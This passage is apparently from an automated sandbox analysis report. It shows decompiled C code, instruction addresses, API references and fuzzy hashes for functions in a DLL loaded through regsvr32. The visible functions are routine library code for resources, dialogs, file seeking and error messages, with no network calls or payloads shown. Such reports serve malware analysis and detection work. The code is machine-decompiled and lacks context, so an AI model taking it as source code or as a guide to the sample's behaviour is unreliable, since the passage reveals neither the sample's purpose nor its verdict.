				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t64 + 0xc)));
					_t60 = E100247E7(0, _t56, __edi, _t62, __eflags);
					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t64 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
						 *(_t64 - 4) = _t55;
						_t63 = _t46;
						if( *(_t64 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t64 - 0x14)));
							_push(_t55);
							E10022A6E();
						}
						_t55 = _t63;
						L5:
						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t64 - 0x1c)) = 0x100572c4;
						E10024848(_t64 - 0x1c);
						return E1003D2BE(_t55);
					}
					_push(_t60);
					E1002FA2A( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
					__eflags =  *(_t64 - 0x10);
					 *(_t64 - 4) = 0;
					if( *(_t64 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_push(0);
						E10022A6E();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t64 + 0x10)));
				goto L2;
			}











                                                                                                                0x10030de8
                                                                                                                0x10030de8
                                                                                                                0x10030def
                                                                                                                0x10030df4
                                                                                                                0x10030df6
                                                                                                                0x10030df9
                                                                                                                0x10030e00
                                                                                                                0x10030e09
                                                                                                                0x10030e0c
                                                                                                                0x10030e0f
                                                                                                                0x10030e17
                                                                                                                0x10030e1b
                                                                                                                0x10030e59
                                                                                                                0x10030e61
                                                                                                                0x10030e6a
                                                                                                                0x10030e7f
                                                                                                                0x10030e8d
                                                                                                                0x10030e93
                                                                                                                0x10030e95
                                                                                                                0x10030e98
                                                                                                                0x10030e20
                                                                                                                0x10030e24
                                                                                                                0x10030e2a
                                                                                                                0x10030e2d
                                                                                                                0x10030e2f
                                                                                                                0x10030e31
                                                                                                                0x10030e34
                                                                                                                0x10030e35
                                                                                                                0x10030e35
                                                                                                                0x10030e3a
                                                                                                                0x10030e3c
                                                                                                                0x10030e3c
                                                                                                                0x10030e43
                                                                                                                0x10030e4a
                                                                                                                0x10030e56
                                                                                                                0x10030e56
                                                                                                                0x10030ea3
                                                                                                                0x10030ea4
                                                                                                                0x10030ea9
                                                                                                                0x10030eac
                                                                                                                0x10030eaf
                                                                                                                0x10030eb1
                                                                                                                0x10030eb4
                                                                                                                0x10030eb5
                                                                                                                0x10030eb5
                                                                                                                0x00000000
                                                                                                                0x10030eaf
                                                                                                                0x10030e1d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2161412305-0
                                                                                                                • Opcode ID: 853f563e9cda0a2e46cf4fa50cc0200a65220ce54ebce3e63f591d04cd49029a
                                                                                                                • Instruction ID: 0e80549b52fdf9fcae58d9139d4dc047d7ed36b4e4bc231020cefd4c007a9893
                                                                                                                • Opcode Fuzzy Hash: 853f563e9cda0a2e46cf4fa50cc0200a65220ce54ebce3e63f591d04cd49029a
                                                                                                                • Instruction Fuzzy Hash: EA211975E0024AEFDB02DFA4D8809EFBBB8FF08201F41856AF515A7151DB74AA05DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002BF42 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1002BF42(void* __ecx, void* __edx, CHAR* _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t25;
				CHAR* _t26;
				void* _t32;
				void* _t35;
				struct HRSRC__* _t36;
				void* _t37;
				CHAR* _t38;
				CHAR* _t39;
				void* _t40;

				_t35 = __edx;
				_t33 = __ecx;
				_t39 = _a4;
				_t41 =  *(_t39 + 4) & 0x00000001;
				_t32 = __ecx;
				if(( *(_t39 + 4) & 0x00000001) == 0) {
					_t36 = FindResourceA( *(_t39 + 8),  *(_t39 + 0xc), 5);
					__eflags = _t36;
					if(_t36 == 0) {
						E10023F14(_t33);
					}
					_t37 = LoadResource( *(_t39 + 8), _t36);
					__eflags = _t37;
					if(_t37 == 0) {
						E10023F14(_t33);
					}
					_t38 = LockResource(_t37);
					__eflags = _t38;
					if(__eflags == 0) {
						E10023F14(_t33);
					}
				} else {
					_t38 =  *(_t39 + 0xc);
				}
				_t23 = E10023187(_t32, _t38, _t39, _t41);
				_t42 =  *((intOrPtr*)(_t23 + 0x3c));
				if( *((intOrPtr*)(_t23 + 0x3c)) != 0) {
					_t38 = E1002AE94(_t32, _t32, _t38, _t40, _t38);
				}
				_push(_a8);
				_push(_t38);
				_a4 = E1002BE5C(_t32, _t35, _t38, _t39, _t42);
				_t25 =  *(_t32 + 0x5c);
				if(_t25 != 0) {
					GlobalFree(_t25);
					 *(_t32 + 0x5c) =  *(_t32 + 0x5c) & 0x00000000;
				}
				_t26 = _a4;
				if(_t26 != 0) {
					_t38 = _t26;
					 *(_t32 + 0x5c) = _t26;
				}
				 *(_t39 + 4) =  *(_t39 + 4) | 0x00000001;
				 *(_t39 + 0xc) = _t38;
				return _t26;
			}

















                                                                                                                0x1002bf42
                                                                                                                0x1002bf42
                                                                                                                0x1002bf47
                                                                                                                0x1002bf4a
                                                                                                                0x1002bf4f
                                                                                                                0x1002bf51
                                                                                                                0x1002bf66
                                                                                                                0x1002bf68
                                                                                                                0x1002bf6a
                                                                                                                0x1002bf6c
                                                                                                                0x1002bf6c
                                                                                                                0x1002bf7b
                                                                                                                0x1002bf7d
                                                                                                                0x1002bf7f
                                                                                                                0x1002bf81
                                                                                                                0x1002bf81
                                                                                                                0x1002bf8d
                                                                                                                0x1002bf8f
                                                                                                                0x1002bf91
                                                                                                                0x1002bf93
                                                                                                                0x1002bf93
                                                                                                                0x1002bf53
                                                                                                                0x1002bf53
                                                                                                                0x1002bf53
                                                                                                                0x1002bf98
                                                                                                                0x1002bf9d
                                                                                                                0x1002bfa1
                                                                                                                0x1002bfab
                                                                                                                0x1002bfab
                                                                                                                0x1002bfad
                                                                                                                0x1002bfb0
                                                                                                                0x1002bfb6
                                                                                                                0x1002bfb9
                                                                                                                0x1002bfbe
                                                                                                                0x1002bfc1
                                                                                                                0x1002bfc7
                                                                                                                0x1002bfc7
                                                                                                                0x1002bfcb
                                                                                                                0x1002bfd0
                                                                                                                0x1002bfd2
                                                                                                                0x1002bfd4
                                                                                                                0x1002bfd4
                                                                                                                0x1002bfd7
                                                                                                                0x1002bfdb
                                                                                                                0x1002bfe2

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1002BF60
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1002BF75
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1002BF87
                                                                                                                • GlobalFree.KERNEL32(?), ref: 1002BFC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeGlobalLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3898064442-0
                                                                                                                • Opcode ID: c292e8a3e361ccacb43d5460c7091ec530d51ba018098cfedfd3db96603df792
                                                                                                                • Instruction ID: 776a8ecff99ac8d10405ddbbc1f7a8f433c5d66df8e6285090a91246efa81e06
                                                                                                                • Opcode Fuzzy Hash: c292e8a3e361ccacb43d5460c7091ec530d51ba018098cfedfd3db96603df792
                                                                                                                • Instruction Fuzzy Hash: 8C11C139200B01AFDB91DF65ED84B1ABBF5EF847A0B828439F84987211DB30E841CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100041C0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 57%
                                                                                                                			E100041C0(intOrPtr __ecx, void* __eflags) {
				signed int _v4;
				signed int _v8;
				char _v264;
				char _v528;
				char _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				char* _v548;
				char _v552;
				void* _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				signed int _t23;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				signed int _t41;

				_t40 =  &_v556;
				_t19 =  *0x1006dbdc; // 0xdf7c0cda
				_v4 = _t19 ^ _t40;
				_t39 = __ecx;
				E1003BB70(_t37,  &_v264, 0, 0x104);
				_t41 = _t40 + 0xc;
				if(_t39 != 0) {
					_v556 =  *((intOrPtr*)(_t39 + 0x20));
				} else {
					_v556 = 0;
				}
				_t23 =  &_v556;
				_t36 =  &_v264;
				_v552 = 0;
				_v548 =  &_v264;
				_v544 = 0x100571d0;
				_v540 = 0x10;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				__imp__SHBrowseForFolderA(_t23);
				_t38 = _t23;
				if(_t38 != 0) {
					E1003BB70(_t38,  &_v528, 0, 0x104);
					_t41 = _t41 + 0xc;
					_t36 =  &_v528;
					__imp__SHGetPathFromIDListA(_t38,  &_v528);
					_t23 = E1001D2C4(E1001D1C2(_t39, 0x425),  &_v536);
				}
				return E1003B437(_t23, 0, _v8 ^ _t41, _t36, _t38, _t39);
			}
























                                                                                                                0x100041c0
                                                                                                                0x100041c6
                                                                                                                0x100041cd
                                                                                                                0x100041e7
                                                                                                                0x100041e9
                                                                                                                0x100041ee
                                                                                                                0x100041f3
                                                                                                                0x100041fe
                                                                                                                0x100041f5
                                                                                                                0x100041f5
                                                                                                                0x100041f5
                                                                                                                0x10004202
                                                                                                                0x10004206
                                                                                                                0x1000420e
                                                                                                                0x10004212
                                                                                                                0x10004216
                                                                                                                0x1000421e
                                                                                                                0x10004226
                                                                                                                0x1000422a
                                                                                                                0x1000422e
                                                                                                                0x10004232
                                                                                                                0x10004238
                                                                                                                0x1000423c
                                                                                                                0x10004249
                                                                                                                0x1000424e
                                                                                                                0x10004251
                                                                                                                0x10004257
                                                                                                                0x10004270
                                                                                                                0x10004270
                                                                                                                0x1000428c

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$BrowseFolderFromListPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1504547611-0
                                                                                                                • Opcode ID: 6819a6900a6fc75afef4c1d62aa0338534924455249b355e309a386428dcb8fb
                                                                                                                • Instruction ID: e9938d9545fb07109ead17aea578d7edb6f9481b65e8534042f1f63524efbaa1
                                                                                                                • Opcode Fuzzy Hash: 6819a6900a6fc75afef4c1d62aa0338534924455249b355e309a386428dcb8fb
                                                                                                                • Instruction Fuzzy Hash: 2E115CB1604344AFD320EF64D8859AFB7E4FBC8304F40492EF59987241DB749A088B96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10022594 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E10022594(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				void* _t30;

				_t20 = __ebx;
				_t29 = __ecx;
				_push( *((intOrPtr*)(__ecx + 0x10)));
				_t28 = E1004068A(__ebx, _t26, _t27, __ecx, __eflags);
				_t32 = _t28 - 0xffffffff;
				if(_t28 == 0xffffffff) {
					_t29 =  *((intOrPtr*)(_t29 + 0xc));
					_t19 = E1003D491(_t32);
					_push(_t29);
					_push( *_t19);
					_push(6);
					L2:
					E10034C7E(_t20, _t26, _t28, _t29, _t32);
				}
				_push(2);
				_push(0);
				_push( *((intOrPtr*)(_t29 + 0x10)));
				_t10 = E1004077F(_t20, _t26, _t28, _t29, _t32);
				_t30 = _t30 + 0xc;
				_t32 = _t10;
				if(_t10 != 0) {
					_t29 =  *((intOrPtr*)(_t29 + 0xc));
					_t17 = E1003D491(_t32);
					_push(_t29);
					_push( *_t17);
					_push(9);
					goto L2;
				}
				_push(_t20);
				_push( *((intOrPtr*)(_t29 + 0x10)));
				_t21 = E1004068A(_t20, _t26, _t28, _t29, __eflags);
				__eflags = _t21 - 0xffffffff;
				if(__eflags == 0) {
					_t29 =  *((intOrPtr*)(_t29 + 0xc));
					_t16 = E1003D491(__eflags);
					_push(_t29);
					_push( *_t16);
					_push(6);
					L7:
					E10034C7E(_t21, _t26, _t28, _t29, __eflags);
				}
				_push(0);
				_push(_t28);
				_push( *((intOrPtr*)(_t29 + 0x10)));
				_t12 = E1004077F(_t21, _t26, _t28, _t29, __eflags);
				_t30 = _t30 + 0xc;
				__eflags = _t12;
				if(__eflags != 0) {
					_t29 =  *((intOrPtr*)(_t29 + 0xc));
					_t14 = E1003D491(__eflags);
					_push(_t29);
					_push( *_t14);
					_push(9);
					goto L7;
				}
				asm("cdq");
				return _t21;
			}


















                                                                                                                0x10022594
                                                                                                                0x10022595
                                                                                                                0x10022598
                                                                                                                0x100225a0
                                                                                                                0x100225a2
                                                                                                                0x100225a6
                                                                                                                0x100225a8
                                                                                                                0x100225ab
                                                                                                                0x100225b0
                                                                                                                0x100225b1
                                                                                                                0x100225b3
                                                                                                                0x100225b5
                                                                                                                0x100225b5
                                                                                                                0x100225b5
                                                                                                                0x100225ba
                                                                                                                0x100225bc
                                                                                                                0x100225be
                                                                                                                0x100225c1
                                                                                                                0x100225c6
                                                                                                                0x100225c9
                                                                                                                0x100225cb
                                                                                                                0x100225cd
                                                                                                                0x100225d0
                                                                                                                0x100225d5
                                                                                                                0x100225d6
                                                                                                                0x100225d8
                                                                                                                0x00000000
                                                                                                                0x100225d8
                                                                                                                0x100225dc
                                                                                                                0x100225dd
                                                                                                                0x100225e5
                                                                                                                0x100225e7
                                                                                                                0x100225eb
                                                                                                                0x100225ed
                                                                                                                0x100225f0
                                                                                                                0x100225f5
                                                                                                                0x100225f6
                                                                                                                0x100225f8
                                                                                                                0x100225fa
                                                                                                                0x100225fa
                                                                                                                0x100225fa
                                                                                                                0x100225ff
                                                                                                                0x10022601
                                                                                                                0x10022602
                                                                                                                0x10022605
                                                                                                                0x1002260a
                                                                                                                0x1002260d
                                                                                                                0x1002260f
                                                                                                                0x10022611
                                                                                                                0x10022614
                                                                                                                0x10022619
                                                                                                                0x1002261a
                                                                                                                0x1002261c
                                                                                                                0x00000000
                                                                                                                0x1002261c
                                                                                                                0x10022624
                                                                                                                0x10022626

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _fseek_ftell$__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 447802652-0
                                                                                                                • Opcode ID: 11785c1dea90d14335aefef9d0ae8d99f4c363fef8522e8b316b858a84fe4fdf
                                                                                                                • Instruction ID: 43065fcdbdf70210dfcdbe1e975eca8b7f4038d670352e8965e8763de0eff24b
                                                                                                                • Opcode Fuzzy Hash: 11785c1dea90d14335aefef9d0ae8d99f4c363fef8522e8b316b858a84fe4fdf
                                                                                                                • Instruction Fuzzy Hash: 5701C4366017207FDA21AB71AD66F073B65EF41370F228635F855AF1E1DB31BC109A50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10017077 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E10017077(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E1003D1E6(E10052A46, __ebx, __edi, __esi);
				_t35 = E100160BC(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E10017061(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E1003D2F0( &_a4, 0x100650f0);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10017042(0, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}
















                                                                                                                0x10017077
                                                                                                                0x10017077
                                                                                                                0x10017077
                                                                                                                0x10017077
                                                                                                                0x10017077
                                                                                                                0x1001707e
                                                                                                                0x1001708b
                                                                                                                0x1001708d
                                                                                                                0x10017090
                                                                                                                0x10017094
                                                                                                                0x10017097
                                                                                                                0x10017099
                                                                                                                0x10017099
                                                                                                                0x1001709e
                                                                                                                0x100170a1
                                                                                                                0x100170a5
                                                                                                                0x100170a8
                                                                                                                0x100170b4
                                                                                                                0x100170b9
                                                                                                                0x100170bb
                                                                                                                0x100170bd
                                                                                                                0x100170c0
                                                                                                                0x100170c5
                                                                                                                0x100170c7
                                                                                                                0x100170c7
                                                                                                                0x100170e5
                                                                                                                0x100170fb
                                                                                                                0x10017106
                                                                                                                0x1001710e
                                                                                                                0x1001710e
                                                                                                                0x100170e7
                                                                                                                0x100170ea
                                                                                                                0x100170ec
                                                                                                                0x100170ec
                                                                                                                0x10017111

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001707E
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 100170B4
                                                                                                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,DF7C0CDA,00000000,00000000,00000000,?,?,100650F0,00000004,10001016,?,1000172B,80070057), ref: 100170DD
                                                                                                                  • Part of subcall function 10017042: _wctomb_s.LIBCMT ref: 10017052
                                                                                                                • LocalFree.KERNEL32(DF7C0CDA,DF7C0CDA), ref: 10017106
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1615547351-0
                                                                                                                • Opcode ID: 96699d556d2815da47b2b43aeee886ad479d9bc07f5f1e4164edeb2e1857a193
                                                                                                                • Instruction ID: c2498399052ac8db9aa405ae75ae692c91175d9d49365733ee352398681c6ca3
                                                                                                                • Opcode Fuzzy Hash: 96699d556d2815da47b2b43aeee886ad479d9bc07f5f1e4164edeb2e1857a193
                                                                                                                • Instruction Fuzzy Hash: A5113075604249FFDB02DFA4DC81AAE7BB9FB08350F108529FA19CE2A1D671D990CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021078 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E10021078(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E10023187(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}
















                                                                                                                0x1002107b
                                                                                                                0x1002107c
                                                                                                                0x1002107f
                                                                                                                0x10021081
                                                                                                                0x10021088
                                                                                                                0x1002108b
                                                                                                                0x1002108e
                                                                                                                0x10021095
                                                                                                                0x100210ac
                                                                                                                0x100210ac
                                                                                                                0x100210b3
                                                                                                                0x100210be
                                                                                                                0x100210be
                                                                                                                0x100210c2
                                                                                                                0x100210c5
                                                                                                                0x100210cd
                                                                                                                0x100210cf
                                                                                                                0x100210de
                                                                                                                0x100210e2
                                                                                                                0x100210d1
                                                                                                                0x100210d1
                                                                                                                0x100210d4
                                                                                                                0x100210d8
                                                                                                                0x100210d8
                                                                                                                0x100210eb
                                                                                                                0x100210f7
                                                                                                                0x100210f7
                                                                                                                0x100210eb
                                                                                                                0x100210fd
                                                                                                                0x10021102
                                                                                                                0x10021102
                                                                                                                0x1002110e

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1002109E
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 100210A6
                                                                                                                • LockResource.KERNEL32(00000000), ref: 100210B8
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 10021102
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: d528c3fad0c3a46e30780e7f4eed2554d17a32d32ebd42800b60d3eeab54a9ed
                                                                                                                • Instruction ID: 37c5069c528ee4cadaa7fde53341d746ed2c2c5db8b8d058b8015556b7038628
                                                                                                                • Opcode Fuzzy Hash: d528c3fad0c3a46e30780e7f4eed2554d17a32d32ebd42800b60d3eeab54a9ed
                                                                                                                • Instruction Fuzzy Hash: D211C138900791EBD760CFA5E8C5AEAB7F8FF18395F508429E84253950D7B0ED91DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025DDD Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10025DDD(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E1003D1E6(E10053AA1, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E10023679(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x1005bd84;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E10040F00( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E10023187(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1001729E(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E10022D0E(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
